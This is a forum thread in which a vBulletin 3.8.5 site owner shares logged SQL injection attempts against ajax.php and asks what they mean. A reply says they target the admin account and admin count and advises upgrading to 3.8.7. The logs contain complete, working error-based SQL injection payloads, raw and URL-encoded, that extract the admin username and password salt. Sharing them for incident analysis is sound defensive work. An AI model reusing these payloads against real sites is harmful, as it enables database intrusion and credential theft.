Attempted SQL Injection in ajax.php - Please Help

  • Attempted SQL Injection in ajax.php - Please Help

    Hi,

    I got around 50 MySQL error reports yesterday, all with a similar query to ajax.php. Can anyone help me find out what they were trying to do?

    Code:
    Database error in vBulletin 3.8.5:
    
    Invalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'ae15ac777b' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT username FROM vb_user WHERE userid=1)),flOor(raNd(0)*2))x fRom vb_setting groUp bY x)a)#';
    MySQL Error   : Duplicate entry 'Admin1' for key 'group_key'
    Error Number  : 1062
    Request Date  : Saturday, April 27th 2013 @ 10:32:05 AM
    Error Date    : Saturday, April 27th 2013 @ 10:32:05 AM
    Script        : http://www.myforum.com/ajax.php?do=CheckUsername&param=ae15ac777b%27+UnION+SELeCT%28selEct%281%29fROm%28seLEct+coUnT%28%2A%29%2CconCat%28%28SELECT+%28SELECT+username+FROM+vb_user+WHERE+userid%3D1%29%29%2CflOor%28raNd%280%29%2A2%29%29x+fRom+vb_setting+groUp+bY+x%29a%29%23
    Referrer      :
    IP Address    : 78.108.63.44
    Username      : Unregistered
    Classname     : vB_Database
    MySQL Version :
    A few more:

    Code:
    Invalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'a65e57f412' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT COUNT(*) FROM vb_user WHERE usergroupid=6)),flOor(raNd(0)*2))x fRom vb_setting groUp bY x)a)#';
    Code:
    Invalid SQL:
    SELECT COUNT(*) as username FROM `vb_user` WHERE `username` = 'a46b512cee' UnION SELeCT(selEct(1)fROm(seLEct coUnT(*),conCat((SELECT (SELECT salt FROM vb_user WHERE userid=1)),flOor(raNd(0)*2))x fRom vb_setting groUp bY x)a)#';
    
    MySQL Error   : Duplicate entry '6)%1' for key 'group_key'
    Thanks.

  • #2
    They seem to be trying to get info on the main admin account (usually userid 1) and how many administrators you have (usergroup 6).

    You should upgrade to 3.8.7.
